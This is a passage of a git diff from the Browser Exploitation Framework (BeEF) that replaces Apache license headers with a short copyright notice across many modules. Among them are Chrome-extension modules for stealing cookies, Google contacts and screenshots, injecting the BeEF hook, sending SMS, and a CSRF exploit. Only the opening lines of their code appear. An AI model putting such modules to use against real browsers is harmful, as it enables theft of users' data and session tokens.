-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	try{
 		chrome.tabs.create({url:"<%= @url %>"}, function(tab){
diff --git a/modules/chrome_extensions/execute_tabs/config.yaml b/modules/chrome_extensions/execute_tabs/config.yaml
index ae9c3031e..f3c05c603 100644
--- a/modules/chrome_extensions/execute_tabs/config.yaml
+++ b/modules/chrome_extensions/execute_tabs/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/chrome_extensions/execute_tabs/module.rb b/modules/chrome_extensions/execute_tabs/module.rb
index cf476cc61..8e1e31cd1 100644
--- a/modules/chrome_extensions/execute_tabs/module.rb
+++ b/modules/chrome_extensions/execute_tabs/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Execute_tabs < BeEF::Core::Command
 
diff --git a/modules/chrome_extensions/get_all_cookies/command.js b/modules/chrome_extensions/get_all_cookies/command.js
index 4a531214b..d43ec533a 100755
--- a/modules/chrome_extensions/get_all_cookies/command.js
+++ b/modules/chrome_extensions/get_all_cookies/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 	the_url = "<%== @url %>";
 	if (the_url != 'default_all') {
diff --git a/modules/chrome_extensions/get_all_cookies/config.yaml b/modules/chrome_extensions/get_all_cookies/config.yaml
index 04cc73ebd..0b5d3cf7b 100755
--- a/modules/chrome_extensions/get_all_cookies/config.yaml
+++ b/modules/chrome_extensions/get_all_cookies/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/chrome_extensions/get_all_cookies/module.rb b/modules/chrome_extensions/get_all_cookies/module.rb
index 362e62d4f..37cac3263 100755
--- a/modules/chrome_extensions/get_all_cookies/module.rb
+++ b/modules/chrome_extensions/get_all_cookies/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Get_all_cookies < BeEF::Core::Command
  
diff --git a/modules/chrome_extensions/get_chrome_extensions/command.js b/modules/chrome_extensions/get_chrome_extensions/command.js
index 49a38a176..d7f16b3ba 100644
--- a/modules/chrome_extensions/get_chrome_extensions/command.js
+++ b/modules/chrome_extensions/get_chrome_extensions/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	extensions = new Array(
diff --git a/modules/chrome_extensions/get_chrome_extensions/config.yaml b/modules/chrome_extensions/get_chrome_extensions/config.yaml
index 69718be2e..550a48a4a 100644
--- a/modules/chrome_extensions/get_chrome_extensions/config.yaml
+++ b/modules/chrome_extensions/get_chrome_extensions/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/chrome_extensions/get_chrome_extensions/module.rb b/modules/chrome_extensions/get_chrome_extensions/module.rb
index fa42f2e97..c3c027081 100644
--- a/modules/chrome_extensions/get_chrome_extensions/module.rb
+++ b/modules/chrome_extensions/get_chrome_extensions/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 # More info:
 #	http://blog.kotowicz.net/2012/02/intro-to-chrome-addons-hacking.html
diff --git a/modules/chrome_extensions/grab_google_contacts/command.js b/modules/chrome_extensions/grab_google_contacts/command.js
index 0f75afdeb..e19bfe46f 100644
--- a/modules/chrome_extensions/grab_google_contacts/command.js
+++ b/modules/chrome_extensions/grab_google_contacts/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 		var regContacts = '("AuthToken":{"Value":")(.*)("}}};)';
 		function grabCSV(token){
diff --git a/modules/chrome_extensions/grab_google_contacts/config.yaml b/modules/chrome_extensions/grab_google_contacts/config.yaml
index 2046f12b6..2ee430c3c 100644
--- a/modules/chrome_extensions/grab_google_contacts/config.yaml
+++ b/modules/chrome_extensions/grab_google_contacts/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/chrome_extensions/grab_google_contacts/module.rb b/modules/chrome_extensions/grab_google_contacts/module.rb
index 01b9f8c0a..a4f2b9022 100644
--- a/modules/chrome_extensions/grab_google_contacts/module.rb
+++ b/modules/chrome_extensions/grab_google_contacts/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Grab_google_contacts < BeEF::Core::Command
 
diff --git a/modules/chrome_extensions/inject_beef/command.js b/modules/chrome_extensions/inject_beef/command.js
index 0e1a6ec14..ec878845a 100755
--- a/modules/chrome_extensions/inject_beef/command.js
+++ b/modules/chrome_extensions/inject_beef/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
         var beefHookUri = "http://" + beef.net.host + ":" + beef.net.port + beef.net.hook;
diff --git a/modules/chrome_extensions/inject_beef/config.yaml b/modules/chrome_extensions/inject_beef/config.yaml
index 6df5193fb..92416d2dd 100755
--- a/modules/chrome_extensions/inject_beef/config.yaml
+++ b/modules/chrome_extensions/inject_beef/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/chrome_extensions/inject_beef/module.rb b/modules/chrome_extensions/inject_beef/module.rb
index ebb133088..346daea70 100755
--- a/modules/chrome_extensions/inject_beef/module.rb
+++ b/modules/chrome_extensions/inject_beef/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Inject_beef < BeEF::Core::Command
 
diff --git a/modules/chrome_extensions/screenshot/command.js b/modules/chrome_extensions/screenshot/command.js
index 16fcb3b17..bc5df119a 100755
--- a/modules/chrome_extensions/screenshot/command.js
+++ b/modules/chrome_extensions/screenshot/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
     chrome.tabs.captureVisibleTab(null, function(img) {
diff --git a/modules/chrome_extensions/screenshot/config.yaml b/modules/chrome_extensions/screenshot/config.yaml
index 23d222c17..3b293bd55 100755
--- a/modules/chrome_extensions/screenshot/config.yaml
+++ b/modules/chrome_extensions/screenshot/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/chrome_extensions/screenshot/module.rb b/modules/chrome_extensions/screenshot/module.rb
index 75849d756..714290a43 100755
--- a/modules/chrome_extensions/screenshot/module.rb
+++ b/modules/chrome_extensions/screenshot/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Screenshot < BeEF::Core::Command
  
diff --git a/modules/chrome_extensions/send_gvoice_sms/command.js b/modules/chrome_extensions/send_gvoice_sms/command.js
index 279b56c76..a2024ee12 100755
--- a/modules/chrome_extensions/send_gvoice_sms/command.js
+++ b/modules/chrome_extensions/send_gvoice_sms/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 		var to = "<%= @to %>";
 		var message = "<%= @message %>";
diff --git a/modules/chrome_extensions/send_gvoice_sms/config.yaml b/modules/chrome_extensions/send_gvoice_sms/config.yaml
index e8e99a730..4253c482d 100755
--- a/modules/chrome_extensions/send_gvoice_sms/config.yaml
+++ b/modules/chrome_extensions/send_gvoice_sms/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/chrome_extensions/send_gvoice_sms/module.rb b/modules/chrome_extensions/send_gvoice_sms/module.rb
index a692f861c..85950bc03 100755
--- a/modules/chrome_extensions/send_gvoice_sms/module.rb
+++ b/modules/chrome_extensions/send_gvoice_sms/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Send_gvoice_sms < BeEF::Core::Command
 
diff --git a/modules/debug/test_network_request/command.js b/modules/debug/test_network_request/command.js
index 1e298d835..97bca59b8 100644
--- a/modules/debug/test_network_request/command.js
+++ b/modules/debug/test_network_request/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
 	var scheme = "<%= @scheme %>";
diff --git a/modules/debug/test_network_request/config.yaml b/modules/debug/test_network_request/config.yaml
index f753bf17c..b8ba5904d 100644
--- a/modules/debug/test_network_request/config.yaml
+++ b/modules/debug/test_network_request/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/debug/test_network_request/module.rb b/modules/debug/test_network_request/module.rb
index e4de490dd..bddfb3459 100644
--- a/modules/debug/test_network_request/module.rb
+++ b/modules/debug/test_network_request/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Test_network_request < BeEF::Core::Command
 
diff --git a/modules/debug/test_return_ascii_chars/command.js b/modules/debug/test_return_ascii_chars/command.js
index e19a1ea91..afdcea3d8 100644
--- a/modules/debug/test_return_ascii_chars/command.js
+++ b/modules/debug/test_return_ascii_chars/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
     var str = '';
diff --git a/modules/debug/test_return_ascii_chars/config.yaml b/modules/debug/test_return_ascii_chars/config.yaml
index 64eff01e8..7d8c2f4f7 100644
--- a/modules/debug/test_return_ascii_chars/config.yaml
+++ b/modules/debug/test_return_ascii_chars/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/debug/test_return_ascii_chars/module.rb b/modules/debug/test_return_ascii_chars/module.rb
index 1f4b40690..ae81dbfba 100644
--- a/modules/debug/test_return_ascii_chars/module.rb
+++ b/modules/debug/test_return_ascii_chars/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Test_return_ascii_chars < BeEF::Core::Command
   
diff --git a/modules/debug/test_return_long_string/command.js b/modules/debug/test_return_long_string/command.js
index da26b067d..656a48fd7 100644
--- a/modules/debug/test_return_long_string/command.js
+++ b/modules/debug/test_return_long_string/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
-//   Licensed under the Apache License, Version 2.0 (the "License");
-//   you may not use this file except in compliance with the License.
-//   You may obtain a copy of the License at
-//
-//       http://www.apache.org/licenses/LICENSE-2.0
-//
-//   Unless required by applicable law or agreed to in writing, software
-//   distributed under the License is distributed on an "AS IS" BASIS,
-//   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-//   See the License for the specific language governing permissions and
-//   limitations under the License.
+// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
 //
+
 beef.execute(function() {
 
     var repeat_value = "<%= @repeat_string %>";
diff --git a/modules/debug/test_return_long_string/config.yaml b/modules/debug/test_return_long_string/config.yaml
index c44d85390..0bbafff83 100644
--- a/modules/debug/test_return_long_string/config.yaml
+++ b/modules/debug/test_return_long_string/config.yaml
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 beef:
     module:
diff --git a/modules/debug/test_return_long_string/module.rb b/modules/debug/test_return_long_string/module.rb
index 4e1edc68f..f637fc511 100644
--- a/modules/debug/test_return_long_string/module.rb
+++ b/modules/debug/test_return_long_string/module.rb
@@ -1,17 +1,7 @@
 #
-#   Copyright 2012 Wade Alcorn wade@bindshell.net
-#
-#   Licensed under the Apache License, Version 2.0 (the "License");
-#   you may not use this file except in compliance with the License.
-#   You may obtain a copy of the License at
-#
-#       http://www.apache.org/licenses/LICENSE-2.0
-#
-#   Unless required by applicable law or agreed to in writing, software
-#   distributed under the License is distributed on an "AS IS" BASIS,
-#   WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
-#   See the License for the specific language governing permissions and
-#   limitations under the License.
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
 #
 class Test_return_long_string < BeEF::Core::Command
   
diff --git a/modules/exploits/axous_1_1_1_add_user_csrf/command.js b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
index bfa12a6a6..6c4c84a03 100644
--- a/modules/exploits/axous_1_1_1_add_user_csrf/command.js
+++ b/modules/exploits/axous_1_1_1_add_user_csrf/command.js
@@ -1,18 +1,9 @@
 //
-//   Copyright 2012 Wade Alcorn wade@bindshell.net
-//
